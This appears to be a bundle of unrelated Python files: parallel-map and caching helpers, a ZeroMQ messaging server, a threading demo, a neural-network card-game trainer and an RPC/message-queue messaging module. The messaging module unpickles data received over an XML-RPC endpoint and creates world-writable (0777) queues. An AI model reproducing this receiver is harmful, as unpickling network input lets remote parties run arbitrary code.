    assert len(arguments) > 0, "at least one iterable argument is required"
    assert all(np.iterable(args) for args in arguments), "arguments must be iterable"
    length = len(arguments[0])
    assert all(length == len(args) for args in arguments[1:]), "all arguments must have same length"
    # Defaults: one worker per CPU, one chunk per worker.
    numprocesses = kwargs.get("numprocesses", mp.cpu_count())
    nchunks = kwargs.get("nchunks", numprocesses)
    chunksize = kwargs.get("chunksize", None)
    if chunksize is not None:
        warnings.warn("chunksize keyword is deprecated, please use nchunks keyword",
                      DeprecationWarning)
        nchunks = chunksize
    if not kwargs.get("async", True):
        warnings.warn("async == False is deprecated, pmap results are always in "
                      "correct order now",
                      DeprecationWarning)
    # Never spawn more chunks than inputs or workers.
    nchunks = min(numprocesses, length, nchunks)
    # Split every argument sequence into nchunks aligned pieces.
    argchunks = [np.array_split(args, nchunks) for args in arguments]
    def worker(f, conn):
        # Child side: receive one chunk of argument lists, map, send back.
        args = conn.recv()
        result = list(map(f, *args))
        conn.send(result)
    # One duplex pipe per chunk; results are read back in chunk order below,
    # which is what guarantees output order matches input order.
    pipes = [mp.Pipe() for _ in range(nchunks)]
    # NOTE(review): `worker` is a local function, so this relies on the
    # 'fork' start method; it is not picklable under 'spawn'/'forkserver'.
    procs = [mp.Process(target=worker, args=(function, p[1])) for p in pipes]
    for p in procs:
        p.daemon = True
        p.start()
    for i, p in enumerate(pipes):
        # i-th chunk of every argument sequence goes to the i-th worker
        args = [args[i] for args in argchunks]
        p[0].send(args)
    results = [p[0].recv() for p in pipes]
    for p in procs:
        p.join()
    first_arg = arguments[0]
    if isinstance(first_arg, np.ndarray):
        # Preserve ndarray-ness of the input.
        return np.concatenate([x for x in results], axis=0)
    res = []
    for r in results:
        res += r
    return res
def cached(keepOpen=False, lockCacheFile=False, trackCode=True):
    """
    Decorator which caches the result of a slow function in an
    automatically named file in the current working directory
    (cache-<script>-<function>.pkl, or cache-python-<function>.pkl in an
    interactive session).

    Parameters
    ----------
    keepOpen : bool, optional (default = False)
        Keep the cache file open during the whole session.
    lockCacheFile : bool, optional (default = False)
        Lock the cache file during access (necessary when used with pmap);
        do not combine with keepOpen or you will get a dead lock.
    trackCode : bool, optional (default = True)
        If true, also changes in the function's code invalidate the cache.

    Returns
    -------
    f : decorated function

    Notes
    -----
    Supports both bare ``@cached`` and parameterised ``@cached(...)``
    usage: when applied bare, `keepOpen` actually receives the function.
    Arguments and results must be picklable. Delete the cache file to
    force a refresh; see `cached_at` to choose the file name yourself.

    Examples
    --------
    >>> @cached
    ... def slow_function1(a):
    ...     return a
    >>> @cached
    ... def slow_function2(b):
    ...     return b*b
    >>> slow_function1(2)
    2
    >>> slow_function2(2)
    4
    >>> slow_function1(3)
    3

    See also
    --------
    shelve
    pickle
    """
    import inspect
    import os
    from functools import wraps
    from types import FunctionType

    def _auto_cache_name(function):
        # cache-<script>-<function>.pkl; "python" for interactive sessions
        src = inspect.getfile(function)
        prog = os.path.splitext(os.path.basename(src))[0] if os.path.exists(src) else "python"
        return "cache-" + prog + "-" + function.__name__ + ".pkl"

    # Backwards compatibility: bare @cached passes the function as keepOpen.
    if isinstance(keepOpen, FunctionType):
        function = keepOpen
        return cached_at(_auto_cache_name(function))(function)

    def decorator(function):
        @wraps(function)
        @cached_at(_auto_cache_name(function), keepOpen, lockCacheFile, trackCode)
        def decorated_function(*args, **kwargs):
            return function(*args, **kwargs)
        return decorated_function
    return decorator
def cached_at(cacheFileName, keepOpen=False, lockCacheFile=False, trackCode=True):
    """
    Decorator which caches the result of a slow function in a file.
    Parameters
    ----------
    cacheFileName : string
        Path and filename of the cache file.
    keepOpen : bool, optional (default = False)
        Determines whether to keep the cache file open during the whole session.
    lockCacheFile : bool, optional (default = False)
        locks the cache file during access (necessary when used with pmap)
        don't use this option together with keepOpen, otherwise you will get a dead lock
    trackCode: bool, optional (default = True)
        If true, also changes in the code will be tracked.
    Returns
    -------
    f : decorated function
    Notes
    -----
    See the decorator "cached" in this module.
    Limitations
    -----------
    See the decorator "cached" in this module.
    Examples
    --------
    In order to make a cached version of a slow function, do
    >>> @cached_at("mycache1.tmp")
    ... def slow_function1(a):
    ...     return a
    >>> @cached_at("mycache2.tmp")
    ... def slow_function2(b):
    ...     return b*b
    >>> slow_function1(2)
    2
    >>> slow_function2(2)
    4
    >>> slow_function1(3)
    3
    See the decorator "cached" in this module for more information.
    See also
    --------
    shelve
    pickle
    """
    from functools import wraps
    if keepOpen and lockCacheFile:
        # A permanently open shelve would dead-lock against the per-access lock.
        raise ValueError("keepOpen cannot be used together with lockCacheFile")
    if lockCacheFile:
        # Drop-in shelve replacement that locks the cache file around each access.
        from . import locked_shelve as shelve
    else:
        import shelve
    if keepOpen:
        # Open the shelve on function decoration
        _d = shelve.open(cacheFileName, protocol=-1, writeback=False)
    def decorator(function):
        @wraps(function)
        def decorated_function(*args, **kwargs):
            from six.moves import cPickle as pickle
            import six
            import inspect
            import hashlib
            def encode(x):
                # hashlib wants bytes on Python 3; Python 2 strings pass through.
                if six.PY2:
                    return x
                else:
                    return x.encode("utf-8")
            # Pickle the function arguments to use them as key
            # it is preferable not to include the function name in the pickle
            # when the function name changes, the cache file name changes anyway
            # if the user decides to recall the function and manually recall the
            # cache, it will still work
            key = str(pickle.dumps((args, kwargs), protocol=-1))
            # Hash of the function's source; used to invalidate on edits when trackCode is set.
            code_hash = hashlib.md5(encode(inspect.getsource(function))).digest()
            if keepOpen:
                d = _d  # Use open shelve
            else:
                d = shelve.open(cacheFileName, protocol=-1, writeback=False)
            create = True  # this variable is necessary, cached output could be anything, also None
            if key in d:
                assert "cache" in d[
                    key], "Your cache might be outdated. Try to delete and create it again!"
                if trackCode:
                    # Reuse the entry only if this exact source version produced it.
                    if code_hash in d[key]["code_hash"]:
                        output = d[key]["cache"]
                        create = False
                else:
                    output = d[key]["cache"]
                    create = False
            if create:
                if not keepOpen:
                    # Close during the (possibly long) computation so other
                    # processes are not blocked from the cache file.
                    d.close()
                output = function(*args, **kwargs)
                if not keepOpen:
                    d = shelve.open(cacheFileName, protocol=-1, writeback=False)
                if key in d:
                    # Identical output as the stored entry: just register the new
                    # code hash instead of rewriting the cached value.
                    if pickle.dumps([d[key]["cache"]], protocol=-1) == pickle.dumps([output], protocol=-1):
                        dk = d[key]
                        dk["code_hash"] += [code_hash]
                        d[key] = dk
                    else:
                        d[key] = {"code_hash": [code_hash], "cache": output}
                else:
                    d[key] = {"code_hash": [code_hash], "cache": output}
            if not keepOpen:
                d.close()
            return output
        return decorated_function
    return decorator
def memoized(function):
    """
    Caches the output of a function in memory to increase performance.
    Returns
    -------
    f : decorated function
    Notes
    -----
    Speeds up slow calculations that are needed repeatedly within one script
    run. To persist results across script executions, use the "cached"
    decorator instead (which also allows mutable arguments).
    Limitations
    -----------
    Only use with immutable (hashable) arguments such as numbers, tuples and
    strings. Intended for simple mathematical functions; optimized for speed.
    """
    from functools import wraps
    _results = {}
    @wraps(function)
    def decorated_function(*args):
        # EAFP: a hit is the common case, so try the lookup first.
        try:
            return _results[args]
        except KeyError:
            _results[args] = function(*args)
            return _results[args]
    return decorated_function
|
__init__.py | from os import truncate
import signal
import threading
import traceback
from datetime import datetime, timedelta
from functools import lru_cache
from typing import Any, Callable, Dict
from pathlib import Path
import zmq
# Achieve Ctrl-c interrupt recv
signal.signal(signal.SIGINT, signal.SIG_DFL)
KEEP_ALIVE_TOPIC: str = "_keep_alive"
KEEP_ALIVE_INTERVAL: timedelta = timedelta(seconds=1)
KEEP_ALIVE_TOLERANCE: timedelta = timedelta(seconds=30)
class RemoteException(Exception):
    """
    RPC remote exception: wraps an arbitrary value raised on the remote side.
    """
    def __init__(self, value: Any):
        """
        Constructor

        value: the remote error payload (any object).
        """
        self.__value = value
    def __str__(self):
        """
        Output error message
        """
        # BUG FIX: the original returned self.__value directly, which raises
        # "TypeError: __str__ returned non-string" for non-str payloads.
        return str(self.__value)
class MqServer:
    """ZeroMQ SUB/PUB bridge: receives on a SUB socket in a worker thread and
    republishes via a PUB socket; subclasses implement callback()."""
    def __init__(self):
        """
        Constructor
        """
        # Zmq port related
        self.__context: zmq.Context = zmq.Context()
        # Subscribe socket (subscribe pattern)
        self.__socket_subscribe: zmq.Socket = self.__context.socket(zmq.SUB)
        # Publish socket (Publish pattern)
        self.__socket_pubish: zmq.Socket = self.__context.socket(zmq.PUB)
        # BUG FIX: the originals were bare annotations ("self.__reconnect_num:0",
        # "self.__socket_monitor:None"), which never created the attributes.
        self.__reconnect_num: int = 0
        # monitor socket (created by set_monitor())
        self.__socket_monitor = None
        # Worker thread related
        self.__active: bool = False  # MqServer status
        self.__thread: threading.Thread = None  # MqServer thread (None until start())
        self.__lock: threading.Lock = threading.Lock()
    def is_active(self) -> bool:
        """Return True while the receive loop is (or should be) running."""
        return self.__active
    def start(
        self,
        subscribe_address: str,
        publish_address: str
        # server_secretkey_path: str = "",
        # username: str = "",
        # password: str = ""
    ) -> None:
        """
        Start RpcServer

        subscribe_address: endpoint the SUB socket connects to.
        publish_address: endpoint the PUB socket binds to.
        """
        if self.__active:
            return
        # Bind and Listen
        self.__socket_subscribe.connect(subscribe_address)
        self.__socket_pubish.bind(publish_address)
        # set monitor
        self.set_monitor()
        # Start MqServer status
        self.__active = True
        # Start RpcServer thread
        self.__thread = threading.Thread(target=self.run)
        self.__thread.start()
    def stop(self) -> None:
        """
        Stop RpcServer (the worker thread notices the flag on its next poll).
        """
        if not self.__active:
            return
        # Stop RpcServer status
        self.__active = False
    def join(self) -> None:
        # Wait for RpcServer thread to exit
        if self.__thread and self.__thread.is_alive():
            self.__thread.join()
        self.__thread = None
    def run(self) -> None:
        """Worker loop: poll the SUB socket, dispatch messages to callback()."""
        print("run")
        # poll() takes milliseconds; no traffic within the tolerance window
        # counts as a lost heartbeat.
        pull_tolerance = int(KEEP_ALIVE_TOLERANCE.total_seconds() * 1000)
        while self.__active:
            if not self.__socket_subscribe.poll(pull_tolerance):
                self.on_disconnected()
                continue
            # Receive request data from Reply socket
            topic, msg = self.__socket_subscribe.recv_multipart()
            print("have resp")
            # Process data by callable function
            self.callback(topic, msg)
        # Close And Unbind
        self.__socket_subscribe.close()
        self.__socket_pubish.unbind(self.__socket_pubish.LAST_ENDPOINT)
    def publish(self, topic: str, data: Any) -> None:
        """
        Publish data

        Serialized with send_pyobj; locked so multiple threads may publish.
        """
        with self.__lock:
            self.__socket_pubish.send_pyobj([topic, data])
    def callback(self, topic: str, data: Any) -> None:
        """
        Callable function — subclasses must override to handle messages.
        """
        raise NotImplementedError
    def subscribe_topic(self, topics=None) -> None:
        """
        Subscribe data

        topics: iterable of topic strings; empty/None subscribes to everything.
        (BUG FIX: replaced the mutable default argument `topics=[]`.)
        """
        if not topics:
            print("Receiving messages on ALL topics...")
            self.__socket_subscribe.setsockopt(zmq.SUBSCRIBE, b'')
        else:
            print("Receiving messages on topics: %s ..." % topics)
            for t in topics:
                self.__socket_subscribe.setsockopt(zmq.SUBSCRIBE, t.encode('utf-8'))
    def set_reconnect(self) -> None:
        # Placeholder: reconnect policy not implemented yet.
        pass
    def set_monitor(self):
        # Attach a monitor socket to observe SUB-socket connection events.
        self.__socket_monitor = self.__socket_subscribe.get_monitor_socket()
    def on_disconnected(self):
        """
        Callback when heartbeat is lost.
        """
        print("RpcServer has no response over {tolerance} seconds, please check you connection."
              .format(tolerance=KEEP_ALIVE_TOLERANCE.total_seconds()))
|
execution_scheduling.py | '''
Este snippet tiene como propósito realizar un estudio del agendamiento de la creación de threads.
'''
#!/usr/bin/env python3
""" Two threads chopping vegetables """
import threading
import time
chopping = True  # shared flag polled by the worker threads; main thread clears it


def vegetable_chopper():
    """Chop vegetables (increment a counter) until the module-level
    `chopping` flag is cleared, then report this thread's total."""
    # FIX: Thread.getName() is deprecated since Python 3.10; use the attribute.
    name = threading.current_thread().name
    vegetable_count = 0
    while chopping:
        print(name, 'chopped a vegetable!')
        vegetable_count += 1
    print(name, 'chopped', vegetable_count, 'vegetables.')
if __name__ == '__main__':
    # Start two competing chopper threads.
    threading.Thread(target=vegetable_chopper, name='Barron').start()  # thread 1
    threading.Thread(target=vegetable_chopper, name='Olivia').start()  # thread 2
    time.sleep(1)  # chop vegetables for 1 second
    chopping = False  # stop both threads (ends the while loop in each thread)
|
AcimdesTrainingServer.py | import random
from typing import List
import NeuralNetwork as nn
import os
import multiprocessing as mp
import threading as thrd
import pickle
import time
class Cards:
    """A shuffled deck of 32 cards: four copies of each value 0-7, stored as a
    flat list of four independently shuffled runs."""

    def __init__(self):
        """Build the deck."""
        self.cards = []
        for _ in range(4):
            # Each pass appends the values 0-7 in a fresh random order.
            self.cards.extend(random.sample(range(8), 8))

    def lastcard(self):
        """Remove and return the card on top of the deck (the list's tail)."""
        return self.cards.pop()
class Player:
    """One seat at the table: a username, the cards/score bookkeeping, and the
    neural network that picks this player's moves."""

    def __init__(self, username, nn: nn.NeuralNetwork):
        """Create a player named *username* driven by network *nn*."""
        self.username = username
        self.playingNetwork = nn
        self.cardsInHand = []      # cards currently held (values 0-7)
        self.takenCards = [0] * 8  # per-value count of captured cards
        self.score = 0
        # Positional flags maintained by Game while ordering and scoring hands.
        self.isLast = False
        self.isFirst = False
        self.takesTheHand = False

    def __str__(self):
        """A player prints as their username."""
        return self.username

    def __eq__(self, other):
        """Equal to another Player with the same username, or to the bare
        username string; unequal to everything else."""
        if isinstance(other, Player):
            return self.username == other.username
        if isinstance(other, str):
            return self.username == other
        return False

    def throwcard(self, n):
        """Remove and return the card at hand index *n*."""
        return self.cardsInHand.pop(n)
class Game:
    """State and rules for one four-player trick-taking game in which each
    player's moves are chosen by their neural network."""

    def __init__(self, players: List[Player]):
        # Roman-numeral display names for the card values 0-7.
        self.cardsRoman = ['VII', 'VIII', 'IX', 'X', 'D', 'B', 'K', 'A']
        # Legal moves: an index (as text) into the at-most-4-card hand, or 'end'.
        self.allowedInput: List[str] = ['0', '1', '2', '3', 'end']
        self.players: List[Player] = players
        # A random player leads the first hand.
        self.players[random.randint(0, 3)].isFirst = True
        self.cards: Cards = Cards()
        self.dealCards(self.cards, self.players)

    @staticmethod
    def generateInputList(cardsInHand: list[int], hand: list[int], takenCards: list[int], scoreUs: int, scoreThem: int):
        # Flatten the visible game state into the fixed-length (29-value)
        # network input: 4 hand slots, thrown cards padded up to slot 19,
        # then 8 taken-card counters and the two scores; -1 marks empty slots.
        inputList = cardsInHand.copy()
        while len(inputList) < 4:
            inputList.append(-1)
        inputList += hand
        while len(inputList) < 19:
            inputList.append(-1)
        inputList += takenCards + [scoreUs, scoreThem]
        return inputList

    @staticmethod
    def draw(cards, players):
        # Every player draws one card from the top of the deck.
        for i in players:
            i.cardsInHand.append(cards.lastcard())

    @staticmethod
    def dealCards(cards, players):
        # Initial deal: two rounds of two cards to each of the four players.
        for _ in range(2):
            for j in range(4):
                players[j].cardsInHand.append(cards.lastcard())
                players[j].cardsInHand.append(cards.lastcard())

    @staticmethod
    def sortPlayers(players: List[Player]):
        # Rotate the seating order in place until the player flagged isFirst
        # sits at index 0 (at most four rotations).
        for _ in range(4):
            if players[0].isFirst:
                break
            else:
                temp_p = players[0]
                players.pop(0)
                players.append(temp_p)

    def canPlayerContinue(self, cardToBeat, first, i):
        # True when the hand must stop: the leader is up again but holds
        # neither the card to beat nor a 0 (the wild card).
        if (cardToBeat not in self.players[0].cardsInHand and not first and i == self.players[0] and
                0 not in self.players[0].cardsInHand):
            return True
        return False

    def printHand(self, hand, first):
        # Print the cards thrown so far (header skipped on the first throw).
        handOut = '| '
        if not first:
            print("Bačene karte: ")
        for n in hand:
            handOut += self.cardsRoman[n] + ' | '
        print(handOut)

    def printPlayer(self, i):
        # Print player i's hand and query their network.
        # NOTE(review): runNetwork() is called here without an input list,
        # unlike in handplay — confirm against NeuralNetwork's signature.
        cardsInHandOut = '| '
        print(i.__str__())
        for n in i.cardsInHand:
            cardsInHandOut += self.cardsRoman[n] + ' | '
        print("Ruka: " + cardsInHandOut)
        return i.playingNetwork.runNetwork()

    def printOrder(self):
        # Print the current playing order.
        print("Redoslijed igre: ")
        for i in self.players:
            print(f"\t- {i}")

    @staticmethod
    def cardTakesTheHand(thrownCard, cardToBeat, i, players):
        # A throw takes the hand if it matches the card to beat or is a 0;
        # the taker then also leads the next hand.
        if thrownCard == cardToBeat or thrownCard == 0:
            for j in players:
                j.takesTheHand = False
                j.isFirst = False
            i.takesTheHand = True
            i.isFirst = True

    @staticmethod
    def pointSum(hand, players):
        # Cards 3 and 7 are worth 10 points each; the taking player and their
        # teammate (two seats away) both receive the points and the cards.
        sumPoints = 0
        for i in hand:
            if i == 3 or i == 7:
                sumPoints += 10
        for i in players:
            if i.takesTheHand:
                i.score += sumPoints
                players[players.index(i)-2].score += sumPoints
                for j in hand:
                    i.takenCards[j] += 1
                    players[players.index(i) - 2].takenCards[j] += 1
                break

    def pointReset(self):
        # Zero all scores before a new game.
        for i in self.players:
            i.score = 0

    def contDeal(self, firstPlayer):
        # Refill hands (up to 4 cards each) while the deck still has cards.
        if len(self.cards.cards) != 0:
            for i in range(min(4-len(firstPlayer.cardsInHand), int(len(self.cards.cards)/4))):
                self.draw(self.cards, self.players)

    def checkCardInput(self, cardToThrow, cardToBeat, first, a, i, firstPlayer):
        # Validate a proposed move; returns False for anything illegal.
        if cardToThrow not in self.allowedInput:
            #print(f"Nedozvoljeni ulaz.")
            return False
        if cardToThrow == 'end':
            # Only the leading player may end the round, and never on the
            # very first throw.
            if i != firstPlayer or first:
                #print("Trenutno nije moguće završiti rundu!")
                return False
            return True
        if int(cardToThrow) > (3-a):
            # Index beyond the hand size remaining in circle `a`.
            #print(f"Odabrana karta nije unutar raspona.")
            return False
        try:
            # A leader answering a hand must match the card to beat or play a 0.
            if i.cardsInHand[int(cardToThrow)] != cardToBeat and i.cardsInHand[int(cardToThrow)] != 0 and not first and i == firstPlayer:
                #print(f"Odabrana karta nije ispravna.")
                return False
        except:
            return False
        return True

    @property
    def handplay(self):
        # Plays ONE full hand. NOTE: despite being a @property this mutates
        # game state heavily — every attribute access plays a hand.
        # Returns True when the game should stop (illegal network move or
        # deck inconsistency), False when play can continue.
        hand = []
        killCommand = False
        breakHand = False
        first = True
        cardToBeat = None
        i: Player
        for i in self.players:
            i.cardsInHand.sort()
        # Rotate seats so the leader plays first.
        self.sortPlayers(self.players)
        firstPlayer = self.players[0]
        # Start of the hand.
        if len(firstPlayer.cardsInHand) != 0:
            # self.printOrder()
            # Circles (up to 4 throws per player).
            for a in range(4):
                # Sanity check: the deck size must stay even.
                if len(self.cards.cards)%2:
                    killCommand = True
                    break
                # Players take turns within the circle.
                for i in self.players:
                    # Check whether the leading player can continue the hand.
                    breakHand = self.canPlayerContinue(cardToBeat, first, i)
                    if breakHand:
                        # self.printHand(hand, first)
                        break
                    # self.printHand(hand, first)
                    #print(self.generateInputList(i.cardsInHand, hand, i.takenCards, i.score, self.players[self.players.index(i)-1].score))
                    cardToThrowList = i.playingNetwork.runNetwork(self.generateInputList(i.cardsInHand, hand, i.takenCards, i.score, self.players[self.players.index(i)-1].score))
                    # The network's argmax selects the move; output 4 means 'end'.
                    cardToThrow = cardToThrowList.index(max(cardToThrowList))
                    if cardToThrow == 4:
                        cardToThrow = "end"
                    # print(f"{os.getpid()} {cardToThrow}")
                    # An illegal move aborts the whole game (kills this network).
                    if not self.checkCardInput(str(cardToThrow), cardToBeat, first, a, i, firstPlayer):
                        breakHand = True
                        killCommand = True
                        break
                    if cardToThrow == 'end':
                        breakHand = True
                        break
                    # Throw the card; the first throw fixes the card to beat.
                    thrownCard = i.throwcard(int(cardToThrow))
                    if first:
                        cardToBeat = thrownCard
                        first = False
                    print(f"{os.getpid()} {i.username} {thrownCard}")
                    # Check whether the thrown card takes the hand.
                    self.cardTakesTheHand(thrownCard, cardToBeat, i, self.players)
                    # Record the thrown card.
                    hand.append(thrownCard)
                if breakHand:
                    print("Runda je završila.")
                    break
            # Score the hand.
            self.pointSum(hand, self.players)
            # Re-deal.
            self.contDeal(firstPlayer)
            if killCommand:
                print(f"Remainig cards: {self.cards.cards}")
                return True
            if not breakHand:
                print("Runda je završila.")
                pass
            return False
        else:
            # Leader has no cards left: the game is over.
            print(f"Remainig cards: {self.cards.cards}")
            return True

    def playgame(self):
        # Play hands until handplay signals termination, then append the
        # winning team's two networks plus a fitness value to
        # generationResults.txt (pickle-appended in binary mode).
        self.pointReset()
        # print("[STARTING]Starting game.")
        # print(f"Timovi: \n\t-{self.players[0]} i {self.players[2]}\n\t-{self.players[1]} i {self.players[3]}")
        timeStart = time.time()
        while not self.handplay:
            pass
        f = open("generationResults.txt", "ab")
        save = []
        # Fitness = winner's score + 1 + elapsed seconds - cards left in deck.
        if self.players[0].score > self.players[1].score:
            save.append(self.players[0].playingNetwork.neuralNetwork)
            save.append(self.players[2].playingNetwork.neuralNetwork)
            save.append(self.players[0].score + 1 + time.time() - timeStart - len(self.cards.cards))
        elif self.players[0].score < self.players[1].score:
            save.append(self.players[1].playingNetwork.neuralNetwork)
            save.append(self.players[3].playingNetwork.neuralNetwork)
            save.append(self.players[1].score + 1 + time.time() - timeStart - len(self.cards.cards))
        else:
            # Tie on points: the team currently holding the hand wins.
            if self.players[0].takesTheHand + self.players[2].takesTheHand:
                save.append(self.players[0].playingNetwork.neuralNetwork)
                save.append(self.players[2].playingNetwork.neuralNetwork)
                save.append(self.players[0].score + 1 + time.time() - timeStart - len(self.cards.cards))
            else:
                save.append(self.players[1].playingNetwork.neuralNetwork)
                save.append(self.players[3].playingNetwork.neuralNetwork)
                save.append(self.players[1].score + 1 + time.time() - timeStart - len(self.cards.cards))
        pickle.dump(save, f)
        f.close()
def runGame(x: Game):
    # Top-level entry point handed to mp.Pool.map: plays one game to completion.
    x.playgame()
if __name__ == "__main__":
    # random.seed(2)
    # Evolutionary training loop: each generation plays `numberOfGames` games
    # in parallel worker processes; each game appends the winners' networks
    # and a fitness value to generationResults.txt, from which the best pair
    # is cloned into the next generation's players.
    trainingTimeStart = time.time()
    print(f"Generation: 0")
    genTimeStart = time.time()
    numberOfGames = 25
    numberOfPlayers = numberOfGames * 4  # four seats per game
    botPlayers = [Player("bot" + str(i), nn.NeuralNetwork()) for i in range(numberOfPlayers)]
    for i in range(numberOfPlayers):
        # Network topology: 29 inputs (see Game.generateInputList), two hidden
        # layers of 15, and 5 outputs (4 card slots + 'end').
        botPlayers[i].playingNetwork.addInputLayer(29)
        botPlayers[i].playingNetwork.addLayer(15)
        botPlayers[i].playingNetwork.addLayer(15)
        botPlayers[i].playingNetwork.addLayer(5)
    numberOfGeneration = 1000
    games = [Game([botPlayers.pop() for _ in range(4)]) for _ in range(numberOfGames)]
    # Generation 0: dispatch all games across the process pool.
    pool = mp.Pool()
    results = pool.map(runGame, games)
    print(f"Time of generation 0: {time.time() - genTimeStart}")
    """processes = []
    for i in games:
        processes.append(mp.Process(target=i.playgame))
        processes[-1].start()
        processes[-1].join()"""
    """threads = []
    for i in games:
        threads.append(thrd.Thread(target=i.playgame))
        threads[-1].start()
        threads[-1].join()"""
    for i in range(numberOfGeneration):
        print(f"Generation: {i + 1}")
        genTimeStart = time.time()
        generationResults = []
        # Read back every game's [net, net, fitness] triple; a game aborted by
        # an illegal move may have written nothing, hence the bare except.
        f = open("generationResults.txt", "rb")
        for _ in range(numberOfGames):
            try:
                generationResults.append(pickle.load(f))
            except:
                pass
        f.close()
        # Truncate the results file for the next generation.
        f = open("generationResults.txt", "w")
        f.close()
        # Select the highest-fitness entry of this generation.
        bestInGeneration = generationResults[0]
        for j in generationResults:
            if j[2] > bestInGeneration[2]:
                bestInGeneration = j
        # Clone the two winning networks into a fresh population (half each).
        botPlayers = [Player("bot" + str(j) + "_" + str(i), nn.NeuralNetwork()) for j in range(numberOfPlayers)]
        for j in range(numberOfPlayers):
            if j < numberOfPlayers/2:
                botPlayers[j].playingNetwork.neuralNetwork = bestInGeneration[0]
            else:
                botPlayers[j].playingNetwork.neuralNetwork = bestInGeneration[1]
        random.shuffle(botPlayers)
        games = [Game([botPlayers.pop() for _ in range(4)]) for _ in range(numberOfGames)]
        pool = mp.Pool()
        results = pool.map(runGame, games)
        print(f"Time of generation {i+1}: {time.time() - genTimeStart}")
        """threads = []
        for j in games:
            threads.append(thrd.Thread(target=j.playgame))
            threads[-1].start()
            threads[-1].join()"""
        """processes = []
        for j in games:
            processes.append(mp.Process(target=j.playgame))
            processes[-1].start()
            processes[-1].join()"""
    print(f"Training time: {time.time() - trainingTimeStart}")
    # Final pass: keep only the single best result of the last generation.
    generationResults = []
    f = open("generationResults.txt", "rb")
    for _ in range(numberOfGames):
        generationResults.append(pickle.load(f))
    f.close()
    bestInGeneration = generationResults[0]
    for j in generationResults:
        if j[2] > bestInGeneration[2]:
            bestInGeneration = j
    f.close()
    f = open("generationResults.txt", "wb")
    pickle.dump(bestInGeneration, f)
f.close() |
messaging.py | """
Abstraction for communicating between Debussy's processes: the main CLI, the
OpenFlow manager, and the database triggers.
"""
import os
import pickle
import threading
import time
import xmlrpclib
import sysv_ipc
from SimpleXMLRPCServer import SimpleXMLRPCServer
import debussy.profiling
from debussy.log import logger
from debussy.of import OFPP_FLOOD, OFPFC_ADD, OFPFC_DELETE, OFPFC_DELETE_STRICT
def clear_queue(queue_id):
try:
mq = sysv_ipc.MessageQueue(queue_id,
sysv_ipc.IPC_CREAT,
mode=0777)
mq.remove()
except sysv_ipc.PermissionsError:
logger.warning("could not clear clear message queue {0}"
.format(queue_id))
class ConsumableMessage(object):
    """Base class for messages that know how to apply themselves to a consumer."""

    def consume(self, consumer):
        """Apply this message to *consumer* (no-op in the base class).

        consumer: an object containing a function to consume the message"""
        pass
class MessageSender(object):
    """Base class for message senders."""

    def send(self, msg):
        """Send *msg* (no-op in the base class; subclasses override).

        msg: the message to send"""
        pass
class MessageReceiver(object):
    """Base class for message receivers."""

    def start(self):
        """Start a new thread to receive messages (no-op in the base class)."""
        pass

    def stop(self, event=None):
        """Stop the receiver thread (no-op in the base class).

        event: an optional quit message"""
        pass
class MsgQueueSender(MessageSender):
    "A message queue-based message sender"
    def __init__(self, queue_id):
        "queue_id: the integer id of the queue to be used"
        self.queue_id = queue_id
        pc = debussy.profiling.PerfCounter("mq_connect")
        pc.start()
        try:
            # Attach to the existing queue first so its mode is preserved.
            self.mq = sysv_ipc.MessageQueue(self.queue_id,
                                            mode=0777)
        except sysv_ipc.ExistentialError, e:  # Python 2 except-clause syntax
            logger.warning("queue {0} does not exist: {1}"
                           .format(self.queue_id, e))
            # Queue missing: create it, world-accessible.
            self.mq = sysv_ipc.MessageQueue(self.queue_id,
                                            sysv_ipc.IPC_CREAT,
                                            mode=0777)
        pc.stop()
    def send(self, msg):
        """Send the specified message
        msg: the message to send (pickled onto the SysV queue)"""
        pc = debussy.profiling.PerfCounter("mq_send")
        pc.start()
        logger.debug("mq: sending message %s", msg)
        self.mq.send(pickle.dumps(msg))
        pc.stop()
class MsgQueueReceiver(MessageReceiver):
    "A message queue-based message receiver"
    def __init__(self, queue_id, consumer=None):
        """queue_id: the integer id of the queue to receive messages from
        consumer: the consuming object for received messages"""
        self.queue_id = queue_id
        self.consumer = consumer
        self.running = False
        # clear message queue so stale messages do not survive a restart
        clear_queue(self.queue_id)
        self.mq = sysv_ipc.MessageQueue(self.queue_id,
                                        sysv_ipc.IPC_CREAT,
                                        mode=0777)
    def start(self):
        "Start a new thread to receive messages"
        logger.debug("mq_receiver starting")
        self.running = True
        self.t = threading.Thread(target=self._run)
        self.t.start()
    def _run(self):
        # Blocking receive loop; a pickled None acts as the quit sentinel
        # (see stop()), letting the loop re-check self.running.
        while self.running:
            s,_ = self.mq.receive()
            msg = s.decode()
            obj = pickle.loads(msg)
            logger.debug("mq: received message %s", msg)
            if obj is not None:
                obj.consume(self.consumer)
    def stop(self, event=None):
        """Stop the receiver thread
        event: an optional quit message"""
        self.running = False
        # Wake the blocked receive() so _run can observe running == False.
        self.mq.send(pickle.dumps(None))
class RpcSender(MessageSender):
    """A message sender that forwards pickled messages over XML-RPC."""

    def __init__(self, host, port):
        """host: the hostname or IP address of the RPC server
        port: the port for the RPC server"""
        self.addr = "http://{0}:{1}".format(host, port)
        # Time the proxy construction for profiling.
        counter = debussy.profiling.PerfCounter("rpc_connect")
        counter.start()
        self.proxy = xmlrpclib.ServerProxy(self.addr, allow_none=True)
        counter.stop()

    def send(self, msg):
        """Serialize *msg* with pickle and deliver it to the server's
        client_send endpoint.

        msg: the message to send"""
        logger.debug("rpc: sending message %s", msg)
        counter = debussy.profiling.PerfCounter("rpc_send")
        counter.start()
        self.proxy.client_send(pickle.dumps(msg))
        counter.stop()
class RpcReceiver(MessageReceiver):
    "A remote procedure call-based message receiver"
    def __init__(self, host, port, consumer=None):
        """host: the hostname or IP address of the RPC server
        port: the port for the RPC server
        consumer: the consuming object for received messages"""
        self.host = host
        self.port = port
        self.consumer = consumer
        # Serve XML-RPC requests; pickled messages arrive via "client_send".
        self.server = SimpleXMLRPCServer((host, port),
                                         logRequests=False,
                                         allow_none=True)
        self.server.register_function(self._client_send, "client_send")
        self.msg = None
    def _client_send(self, msg):
        # RPC endpoint: unpickle and dispatch; a pickled None (sent by stop())
        # is the quit signal and is deliberately not consumed.
        obj = pickle.loads(msg)
        logger.debug("rpc: received message %s", msg)
        if obj is not None:
            print "CONSUMING MESSAGE", obj
            obj.consume(self.consumer)
    def start(self):
        "Start a new thread to receive messages"
        logger.debug("rpc_receiver starting")
        self.running = True
        self.t = threading.Thread(target=self._run)
        self.t.start()
    def _run(self):
        # Handle one request per iteration so `running` is re-checked between
        # requests.
        while self.running:
            self.server.handle_request()
    def stop(self, event=None):
        """Stop the receiver thread
        event: an optional quit message"""
        self.running = False
